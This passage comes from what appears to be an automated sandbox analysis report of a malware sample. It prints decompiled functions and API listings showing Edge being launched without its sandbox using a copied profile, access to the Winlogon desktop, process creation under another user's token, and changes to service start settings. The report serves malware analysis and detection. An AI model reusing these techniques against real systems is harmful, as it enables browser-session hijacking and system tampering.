                                                            • wsprintfW.USER32 ref: 046369EB
                                                              • Part of subcall function 046472E0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04647329
                                                              • Part of subcall function 046472E0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647339
                                                              • Part of subcall function 046472E0: CreateProcessAsUserW.ADVAPI32(?,00000000,04636938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04647386
                                                            Strings
                                                            • \AppData\Local\Microsoft\Edge\User Data, xrefs: 04636999
                                                            • cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 046369E5
                                                            • %s%s, xrefs: 046369BB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$AddressCreateLibraryLoadProclstrcmpwsprintf$CloseDirectoryErrorFileFindFirstHandleLastProcessUser
                                                            • String ID: %s%s$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 3549361973-1065409233
                                                            • Opcode ID: 2c2b6f6609bf1a819b4fb12dbb4d7504a32defe15a6d3e4951ca6387515e146c
                                                            • Instruction ID: 940702beeefc11b7873faba7b0491fa7a220493cd53563dc954b6fc1cebf078a
                                                            • Opcode Fuzzy Hash: 2c2b6f6609bf1a819b4fb12dbb4d7504a32defe15a6d3e4951ca6387515e146c
                                                            • Instruction Fuzzy Hash: 392196B194011D57CB10EB74DC889DAB7BCEF54304F4045E6A509A3141FB70AA95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E0465E651(void* __ecx) {
                                                            				void* _t4;
                                                            				void* _t11;
                                                            				void* _t16;
                                                            				long _t25;
                                                            				void* _t28;
                                                            
                                                            				if( *0x4684010 != 0xffffffff) {
                                                            					_t25 = GetLastError();
                                                            					_t11 = E0465E94E(__eflags,  *0x4684010);
                                                            					__eflags = _t11 - 0xffffffff;
                                                            					if(_t11 == 0xffffffff) {
                                                            						L5:
                                                            						_t11 = 0;
                                                            					} else {
                                                            						__eflags = _t11;
                                                            						if(__eflags == 0) {
                                                            							_t4 = E0465E988(__eflags,  *0x4684010, 0xffffffff);
                                                            							_pop(_t16);
                                                            							__eflags = _t4;
                                                            							if(_t4 != 0) {
                                                            								_t28 = E04668535(_t16, 1, 0x28);
                                                            								__eflags = _t28;
                                                            								if(__eflags == 0) {
                                                            									L8:
                                                            									_t11 = 0;
                                                            									E0465E988(__eflags,  *0x4684010, 0);
                                                            								} else {
                                                            									__eflags = E0465E988(__eflags,  *0x4684010, _t28);
                                                            									if(__eflags != 0) {
                                                            										_t11 = _t28;
                                                            										_t28 = 0;
                                                            										__eflags = 0;
                                                            									} else {
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            								E046684AD(_t28);
                                                            							} else {
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            					}
                                                            					SetLastError(_t25);
                                                            					return _t11;
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}








                                                            0x0465e658
                                                            0x0465e66b
                                                            0x0465e672
                                                            0x0465e675
                                                            0x0465e678
                                                            0x0465e691
                                                            0x0465e691
                                                            0x0465e67a
                                                            0x0465e67a
                                                            0x0465e67c
                                                            0x0465e686
                                                            0x0465e68c
                                                            0x0465e68d
                                                            0x0465e68f
                                                            0x0465e69f
                                                            0x0465e6a3
                                                            0x0465e6a5
                                                            0x0465e6b9
                                                            0x0465e6b9
                                                            0x0465e6c2
                                                            0x0465e6a7
                                                            0x0465e6b5
                                                            0x0465e6b7
                                                            0x0465e6cb
                                                            0x0465e6cd
                                                            0x0465e6cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0465e6b7
                                                            0x0465e6d0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0465e68f
                                                            0x0465e67c
                                                            0x0465e6d8
                                                            0x0465e6e2
                                                            0x0465e65a
                                                            0x0465e65c
                                                            0x0465e65c

                                                            APIs
                                                            • GetLastError.KERNEL32(00000001,?,0465DBC5,04655C3D,046560E1,?,046562F1,?,00000001,?,?,00000001,?,046815F0,0000000C,046563DA), ref: 0465E65F
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0465E66D
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0465E686
                                                            • SetLastError.KERNEL32(00000000,046562F1,?,00000001,?,?,00000001,?,046815F0,0000000C,046563DA,?,00000001,?), ref: 0465E6D8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 9ed027affa9c532a43ec5a20b6034881a1758ffba44e154943a524fd564eeada
                                                            • Instruction ID: a9d736a6e739f98f9f3db54e5fd57c3418177a2010d7e74e3a64b2f96f9e97d6
                                                            • Opcode Fuzzy Hash: 9ed027affa9c532a43ec5a20b6034881a1758ffba44e154943a524fd564eeada
                                                            • Instruction Fuzzy Hash: 57019E323192126EBF242BB4FC84A672B89EB112B9F30032EE964851F1FF576D026194
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E04643870(short* __ecx) {
                                                            				void* _v8;
                                                            				void* _t7;
                                                            				short* _t12;
                                                            				void* _t14;
                                                            				int _t17;
                                                            				void* _t20;
                                                            
                                                            				_push(__ecx);
                                                            				_t17 = 0;
                                                            				_t12 = __ecx;
                                                            				_t20 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t20 != 0) {
                                                            					_t14 = OpenServiceW(_t20, _t12, 0xf01ff);
                                                            					if(_t14 != 0) {
                                                            						_t7 = LockServiceDatabase(_t20);
                                                            						_v8 = _t7;
                                                            						if(_t7 != 0) {
                                                            							_t17 = ChangeServiceConfigW(_t14, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                            							UnlockServiceDatabase(_v8);
                                                            						}
                                                            						CloseServiceHandle(_t14);
                                                            					}
                                                            					CloseServiceHandle(_t20);
                                                            				}
                                                            				return _t17;
                                                            			}









                                                            0x04643873
                                                            0x0464387c
                                                            0x0464387e
                                                            0x04643888
                                                            0x0464388c
                                                            0x0464389b
                                                            0x0464389f
                                                            0x046438a2
                                                            0x046438a8
                                                            0x046438ad
                                                            0x046438c6
                                                            0x046438c8
                                                            0x046438c8
                                                            0x046438cf
                                                            0x046438cf
                                                            0x046438d6
                                                            0x046438d6
                                                            0x046438e4

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04643BAF), ref: 04643882
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BAF), ref: 04643895
                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 046438A2
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 046438BD
                                                            • UnlockServiceDatabase.ADVAPI32(?), ref: 046438C8
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BAF), ref: 046438CF
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BAF), ref: 046438D6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: ee08e21f579623f20d23adbe48e64373e4e095dfb289068de6c221c1de7bab7a
                                                            • Instruction ID: 9aafd10e3fcdb1560cdd346c851b17c047feefc9cf510b7035783f9011365e98
                                                            • Opcode Fuzzy Hash: ee08e21f579623f20d23adbe48e64373e4e095dfb289068de6c221c1de7bab7a
                                                            • Instruction Fuzzy Hash: 88F0C232301315BB871517B6AC4CE6BBE7CEBC67B27001229FE15D2382FE688C008660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046438F0(short* __ecx) {
                                                            				void* _v8;
                                                            				void* _t7;
                                                            				short* _t12;
                                                            				void* _t14;
                                                            				int _t17;
                                                            				void* _t20;
                                                            
                                                            				_push(__ecx);
                                                            				_t17 = 0;
                                                            				_t12 = __ecx;
                                                            				_t20 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t20 != 0) {
                                                            					_t14 = OpenServiceW(_t20, _t12, 0xf01ff);
                                                            					if(_t14 != 0) {
                                                            						_t7 = LockServiceDatabase(_t20);
                                                            						_v8 = _t7;
                                                            						if(_t7 != 0) {
                                                            							_t17 = ChangeServiceConfigW(_t14, 0xffffffff, 3, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                            							UnlockServiceDatabase(_v8);
                                                            						}
                                                            						CloseServiceHandle(_t14);
                                                            					}
                                                            					CloseServiceHandle(_t20);
                                                            				}
                                                            				return _t17;
                                                            			}









                                                            0x046438f3
                                                            0x046438fc
                                                            0x046438fe
                                                            0x04643908
                                                            0x0464390c
                                                            0x0464391b
                                                            0x0464391f
                                                            0x04643922
                                                            0x04643928
                                                            0x0464392d
                                                            0x04643946
                                                            0x04643948
                                                            0x04643948
                                                            0x0464394f
                                                            0x0464394f
                                                            0x04643956
                                                            0x04643956
                                                            0x04643964

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04643BB8), ref: 04643902
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BB8), ref: 04643915
                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 04643922
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 0464393D
                                                            • UnlockServiceDatabase.ADVAPI32(?), ref: 04643948
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BB8), ref: 0464394F
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BB8), ref: 04643956
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: 740e7fc62c428f2fa745f3723ba0f92db55e834b0d9a6043e230bb108f64441f
                                                            • Instruction ID: 2465cfbbab91bbbd1ffcf629f8da64def6583bef306f3e9a507127e74194e59e
                                                            • Opcode Fuzzy Hash: 740e7fc62c428f2fa745f3723ba0f92db55e834b0d9a6043e230bb108f64441f
                                                            • Instruction Fuzzy Hash: 04F06232705316BB971517B6AC4CE6B7EBCEBC67A27101268FE15D2382FE688D408660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04651D50(void* __ecx, intOrPtr _a4) {
                                                            				struct _CRITICAL_SECTION* _t20;
                                                            				void* _t24;
                                                            
                                                            				_t24 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) == 2) {
                                                            					_t20 = __ecx + 0x28;
                                                            					if(TryEnterCriticalSection(_t20) == 0) {
                                                            						L8:
                                                            						return 1;
                                                            					} else {
                                                            						if( *((intOrPtr*)(_t24 + 0x24)) == 2) {
                                                            							if(_a4 == 0) {
                                                            								E04651100( *((intOrPtr*)(_t24 + 0x40)), timeGetTime());
                                                            								LeaveCriticalSection(_t20);
                                                            								goto L8;
                                                            							} else {
                                                            								L04650B00( *((intOrPtr*)(_t24 + 0x40)));
                                                            								LeaveCriticalSection(_t20);
                                                            								return 1;
                                                            							}
                                                            						} else {
                                                            							SetLastError(0x139f);
                                                            							LeaveCriticalSection(_t20);
                                                            							return 0;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				}
                                                            			}





                                                            0x04651d54
                                                            0x04651d5a
                                                            0x04651d6f
                                                            0x04651d7b
                                                            0x04651dd4
                                                            0x04651ddc
                                                            0x04651d7d
                                                            0x04651d81
                                                            0x04651da1
                                                            0x04651dc8
                                                            0x04651dce
                                                            0x00000000
                                                            0x04651da3
                                                            0x04651da6
                                                            0x04651dac
                                                            0x04651dba
                                                            0x04651dba
                                                            0x04651d83
                                                            0x04651d88
                                                            0x04651d8f
                                                            0x04651d9a
                                                            0x04651d9a
                                                            0x04651d81
                                                            0x04651d5c
                                                            0x04651d61
                                                            0x04651d6b
                                                            0x04651d6b

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651D61
                                                            • RtlTryEnterCriticalSection.NTDLL(?), ref: 04651D73
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651D88
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04651D8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 39a5d4da897e86281d44a92af227b55c09a79862c0888fc4e83eb6d4ee1393e7
                                                            • Instruction ID: 7df9c973fe2d04dd41fc7ebefffde2c29f95fb5a62fdb9153087426559f8a2c9
                                                            • Opcode Fuzzy Hash: 39a5d4da897e86281d44a92af227b55c09a79862c0888fc4e83eb6d4ee1393e7
                                                            • Instruction Fuzzy Hash: 59018832200214DBD724A7A9F44CAFAB7ACEB95722F00413BF506C1550FB75A851C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046456E0() {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HDESK__* _t12;
                                                            				struct HDESK__* _t13;
                                                            
                                                            				_t12 = GetThreadDesktop(GetCurrentThreadId());
                                                            				_t13 = OpenDesktopA("Winlogon", 0, 0, 0x400001cf);
                                                            				if(_t13 == 0) {
                                                            					L3:
                                                            					return 0;
                                                            				} else {
                                                            					if(E04645660(_t13, _t12, _t13) != 0) {
                                                            						PostMessageW(0xffff, 0x312, 0, 0x2e0003);
                                                            						if(_t12 != 0) {
                                                            							E04645660(_t12, _t12, _t13);
                                                            						}
                                                            						return 1;
                                                            					} else {
                                                            						CloseDesktop(_t13);
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            			}







                                                            0x046456fd
                                                            0x04645705
                                                            0x04645709
                                                            0x0464571e
                                                            0x04645721
                                                            0x0464570b
                                                            0x04645714
                                                            0x04645733
                                                            0x0464573b
                                                            0x0464573f
                                                            0x0464573f
                                                            0x0464574b
                                                            0x04645716
                                                            0x04645717
                                                            0x00000000
                                                            0x04645717
                                                            0x04645714

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 046456E2
                                                            • GetThreadDesktop.USER32(00000000,?,?,04641DAB), ref: 046456E9
                                                            • OpenDesktopA.USER32(Winlogon,00000000,00000000,400001CF), ref: 046456FF
                                                              • Part of subcall function 04645660: GetCurrentThreadId.KERNEL32 ref: 04645677
                                                              • Part of subcall function 04645660: GetThreadDesktop.USER32(00000000,?,00000000), ref: 0464567E
                                                              • Part of subcall function 04645660: GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 0464569C
                                                            • CloseDesktop.USER32(00000000,?,?,04641DAB), ref: 04645717
                                                            • PostMessageW.USER32(0000FFFF,00000312,00000000,002E0003), ref: 04645733
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                            • String ID: Winlogon
                                                            • API String ID: 3882203166-744610081
                                                            • Opcode ID: 1dfc36a4b9aada8ac749bfcf5ea06d82025f4c5795acd1738df1acb77852ca69
                                                            • Instruction ID: 043f36ef4585eb3591e0ecb23974a24c17cb0b1b3aa049ffa51979d77c26c3ee
                                                            • Opcode Fuzzy Hash: 1dfc36a4b9aada8ac749bfcf5ea06d82025f4c5795acd1738df1acb77852ca69
                                                            • Instruction Fuzzy Hash: BBF082323C0310B7EB252624BD0DFAE2619DBC5B64F151434F6029A2C4FE989C425648
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E0466C4B8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				void* _v24;
                                                            				signed int _t49;
                                                            				signed int _t54;
                                                            				int _t58;
                                                            				signed int _t60;
                                                            				short* _t62;
                                                            				signed int _t66;
                                                            				short* _t70;
                                                            				int _t71;
                                                            				int _t78;
                                                            				short* _t81;
                                                            				signed int _t87;
                                                            				signed int _t90;
                                                            				void* _t95;
                                                            				void* _t96;
                                                            				int _t98;
                                                            				short* _t101;
                                                            				int _t103;
                                                            				signed int _t106;
                                                            				short* _t107;
                                                            				void* _t110;
                                                            
                                                            				_push(__ecx);
                                                            				_push(__ecx);
                                                            				_t49 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t49 ^ _t106;
                                                            				_push(__esi);
                                                            				_t103 = _a20;
                                                            				if(_t103 > 0) {
                                                            					_t78 = E0466EC2E(_a16, _t103);
                                                            					_t110 = _t78 - _t103;
                                                            					_t4 = _t78 + 1; // 0x1
                                                            					_t103 = _t4;
                                                            					if(_t110 >= 0) {
                                                            						_t103 = _t78;
                                                            					}
                                                            				}
                                                            				_t98 = _a32;
                                                            				if(_t98 == 0) {
                                                            					_t98 =  *( *_a4 + 8);
                                                            					_a32 = _t98;
                                                            				}
                                                            				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                            				_v12 = _t54;
                                                            				if(_t54 == 0) {
                                                            					L38:
                                                            					return E04655AFE(_v8 ^ _t106);
                                                            				} else {
                                                            					_t95 = _t54 + _t54;
                                                            					_t85 = _t95 + 8;
                                                            					asm("sbb eax, eax");
                                                            					if((_t95 + 0x00000008 & _t54) == 0) {
                                                            						_t81 = 0;
                                                            						__eflags = 0;
                                                            						L14:
                                                            						if(_t81 == 0) {
                                                            							L36:
                                                            							_t105 = 0;
                                                            							L37:
                                                            							E0465F190(_t81);
                                                            							goto L38;
                                                            						}
                                                            						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                            						_t121 = _t58;
                                                            						if(_t58 == 0) {
                                                            							goto L36;
                                                            						}
                                                            						_t100 = _v12;
                                                            						_t60 = E04669282(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                            						_t105 = _t60;
                                                            						if(_t105 == 0) {
                                                            							goto L36;
                                                            						}
                                                            						if((_a12 & 0x00000400) == 0) {
                                                            							_t96 = _t105 + _t105;
                                                            							_t87 = _t96 + 8;
                                                            							__eflags = _t96 - _t87;
                                                            							asm("sbb eax, eax");
                                                            							__eflags = _t87 & _t60;
                                                            							if((_t87 & _t60) == 0) {
                                                            								_t101 = 0;
                                                            								__eflags = 0;
                                                            								L30:
                                                            								__eflags = _t101;
                                                            								if(__eflags == 0) {
                                                            									L35:
                                                            									E0465F190(_t101);
                                                            									goto L36;
                                                            								}
                                                            								_t62 = E04669282(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                            								__eflags = _t62;
                                                            								if(_t62 == 0) {
                                                            									goto L35;
                                                            								}
                                                            								_push(0);
                                                            								_push(0);
                                                            								__eflags = _a28;
                                                            								if(_a28 != 0) {
                                                            									_push(_a28);
                                                            									_push(_a24);
                                                            								} else {
                                                            									_push(0);
                                                            									_push(0);
                                                            								}
                                                            								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                            								__eflags = _t105;
                                                            								if(_t105 != 0) {
                                                            									E0465F190(_t101);
                                                            									goto L37;
                                                            								} else {
                                                            									goto L35;
                                                            								}
                                                            							}
                                                            							_t90 = _t96 + 8;
                                                            							__eflags = _t96 - _t90;
                                                            							asm("sbb eax, eax");
                                                            							_t66 = _t60 & _t90;
                                                            							_t87 = _t96 + 8;
                                                            							__eflags = _t66 - 0x400;
                                                            							if(_t66 > 0x400) {
                                                            								__eflags = _t96 - _t87;
                                                            								asm("sbb eax, eax");
                                                            								_t101 = E046684E7(_t87, _t66 & _t87);
                                                            								_pop(_t87);
                                                            								__eflags = _t101;
                                                            								if(_t101 == 0) {
                                                            									goto L35;
                                                            								}
                                                            								 *_t101 = 0xdddd;
                                                            								L28:
                                                            								_t101 =  &(_t101[4]);
                                                            								goto L30;
                                                            							}
                                                            							__eflags = _t96 - _t87;
                                                            							asm("sbb eax, eax");
                                                            							E04671860();
                                                            							_t101 = _t107;
                                                            							__eflags = _t101;
                                                            							if(_t101 == 0) {
                                                            								goto L35;
                                                            							}
                                                            							 *_t101 = 0xcccc;
                                                            							goto L28;
                                                            						}
                                                            						_t70 = _a28;
                                                            						if(_t70 == 0) {
                                                            							goto L37;
                                                            						}
                                                            						_t125 = _t105 - _t70;
                                                            						if(_t105 > _t70) {
                                                            							goto L36;
                                                            						}
                                                            						_t71 = E04669282(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                            						_t105 = _t71;
                                                            						if(_t71 != 0) {
                                                            							goto L37;
                                                            						}
                                                            						goto L36;
                                                            					}
                                                            					asm("sbb eax, eax");
                                                            					_t72 = _t54 & _t95 + 0x00000008;
                                                            					_t85 = _t95 + 8;
                                                            					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                            						__eflags = _t95 - _t85;
                                                            						asm("sbb eax, eax");
                                                            						_t81 = E046684E7(_t85, _t72 & _t85);
                                                            						_pop(_t85);
                                                            						__eflags = _t81;
                                                            						if(__eflags == 0) {
                                                            							goto L36;
                                                            						}
                                                            						 *_t81 = 0xdddd;
                                                            						L12:
                                                            						_t81 =  &(_t81[4]);
                                                            						goto L14;
                                                            					}
                                                            					asm("sbb eax, eax");
                                                            					E04671860();
                                                            					_t81 = _t107;
                                                            					if(_t81 == 0) {
                                                            						goto L36;
                                                            					}
                                                            					 *_t81 = 0xcccc;
                                                            					goto L12;
                                                            				}
                                                            			}


























                                                            0x0466c4bd
                                                            0x0466c4be
                                                            0x0466c4bf
                                                            0x0466c4c6
                                                            0x0466c4ca
                                                            0x0466c4cb
                                                            0x0466c4d1
                                                            0x0466c4d7
                                                            0x0466c4dd
                                                            0x0466c4e0
                                                            0x0466c4e0
                                                            0x0466c4e3
                                                            0x0466c4e5
                                                            0x0466c4e5
                                                            0x0466c4e3
                                                            0x0466c4e7
                                                            0x0466c4ec
                                                            0x0466c4f3
                                                            0x0466c4f6
                                                            0x0466c4f6
                                                            0x0466c512
                                                            0x0466c518
                                                            0x0466c51d
                                                            0x0466c6b0
                                                            0x0466c6c3
                                                            0x0466c523
                                                            0x0466c523
                                                            0x0466c526
                                                            0x0466c52b
                                                            0x0466c52f
                                                            0x0466c583
                                                            0x0466c583
                                                            0x0466c585
                                                            0x0466c587
                                                            0x0466c6a5
                                                            0x0466c6a5
                                                            0x0466c6a7
                                                            0x0466c6a8
                                                            0x00000000
                                                            0x0466c6ae
                                                            0x0466c598
                                                            0x0466c59e
                                                            0x0466c5a0
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c5a6
                                                            0x0466c5b8
                                                            0x0466c5bd
                                                            0x0466c5c1
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c5ce
                                                            0x0466c608
                                                            0x0466c60b
                                                            0x0466c60e
                                                            0x0466c610
                                                            0x0466c612
                                                            0x0466c614
                                                            0x0466c660
                                                            0x0466c660
                                                            0x0466c662
                                                            0x0466c662
                                                            0x0466c664
                                                            0x0466c69e
                                                            0x0466c69f
                                                            0x00000000
                                                            0x0466c6a4
                                                            0x0466c678
                                                            0x0466c67d
                                                            0x0466c67f
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c683
                                                            0x0466c684
                                                            0x0466c685
                                                            0x0466c688
                                                            0x0466c6c4
                                                            0x0466c6c7
                                                            0x0466c68a
                                                            0x0466c68a
                                                            0x0466c68b
                                                            0x0466c68b
                                                            0x0466c698
                                                            0x0466c69a
                                                            0x0466c69c
                                                            0x0466c6cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c69c
                                                            0x0466c616
                                                            0x0466c619
                                                            0x0466c61b
                                                            0x0466c61d
                                                            0x0466c61f
                                                            0x0466c622
                                                            0x0466c627
                                                            0x0466c642
                                                            0x0466c644
                                                            0x0466c64e
                                                            0x0466c650
                                                            0x0466c651
                                                            0x0466c653
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c655
                                                            0x0466c65b
                                                            0x0466c65b
                                                            0x00000000
                                                            0x0466c65b
                                                            0x0466c629
                                                            0x0466c62b
                                                            0x0466c62f
                                                            0x0466c634
                                                            0x0466c636
                                                            0x0466c638
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c63a
                                                            0x00000000
                                                            0x0466c63a
                                                            0x0466c5d0
                                                            0x0466c5d5
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c5db
                                                            0x0466c5dd
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c5f4
                                                            0x0466c5f9
                                                            0x0466c5fd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c603
                                                            0x0466c536
                                                            0x0466c538
                                                            0x0466c53a
                                                            0x0466c542
                                                            0x0466c561
                                                            0x0466c563
                                                            0x0466c56d
                                                            0x0466c56f
                                                            0x0466c570
                                                            0x0466c572
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c578
                                                            0x0466c57e
                                                            0x0466c57e
                                                            0x00000000
                                                            0x0466c57e
                                                            0x0466c546
                                                            0x0466c54a
                                                            0x0466c54f
                                                            0x0466c553
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c559
                                                            0x00000000
                                                            0x0466c559

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04667F57,04667F57,?,?,?,0466C709,00000001,00000001,44E85006), ref: 0466C512
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0466C709,00000001,00000001,44E85006,?,?,?), ref: 0466C598
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,44E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0466C692
                                                            • __freea.LIBCMT ref: 0466C69F
                                                              • Part of subcall function 046684E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04668519
                                                            • __freea.LIBCMT ref: 0466C6A8
                                                            • __freea.LIBCMT ref: 0466C6CD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
